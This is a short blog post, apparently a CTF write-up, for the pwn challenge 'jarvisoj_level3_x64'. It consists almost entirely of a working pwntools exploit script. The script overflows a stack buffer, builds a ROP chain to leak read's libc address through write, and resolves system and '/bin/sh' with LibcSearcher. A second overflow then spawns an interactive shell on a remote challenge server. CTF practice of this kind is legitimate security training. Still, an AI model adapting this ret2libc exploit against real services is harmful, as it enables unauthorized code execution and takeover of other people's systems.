pwn | jarvisoj_level3_x64

pwn | jarvisoj_level3_x64

x64 ret2libc

exp:

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

p_vuln = 0x00000000004005E6
p_main = 0x000000000040061A
p_str = 0x00000000004006DC
# p = process('./level3_x64')
p = remote('node4.buuoj.cn', 27746)
elf = ELF('./level3_x64')


p_pop_rdi_ret = 0x00000000004006b3
p_pop_rsi_r15_ret = 0x00000000004006b1
p_ret=  0x0000000000400499

p_plt_write = elf.plt['write']
p_got_read = elf.got['read']

p.recvuntil('Input:\n')
input()

p.sendline(b'M'*(0x80+8) + p64(p_pop_rdi_ret) +p64(1) + p64(p_pop_rsi_r15_ret)+ 
        p64(p_got_read) + p64(0) + p64(p_plt_write) + p64(p_main)
        )

p_libc_read = u64(p.recv(8))
print(f'> p_libc_read: {hex(p_libc_read)}')

libc = LibcSearcher('read', p_libc_read)
libc_base = p_libc_read - libc.dump('read')
print(f'> libc_base: {hex(libc_base)}')
p_system = libc_base + libc.dump('system')
p_binsh = libc_base + libc.dump('str_bin_sh')

p.recvuntil('Input:\n')
# p.sendline(b'M'*(0x80+8) + p64(p_main))
p.sendline(b'M'*(0x80+8) + p64(p_ret) +  p64(p_pop_rdi_ret) + p64(p_binsh) + p64(p_system))

p.interactive()


posted @   Mz1  阅读(77)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
点击右上角即可分享
微信分享提示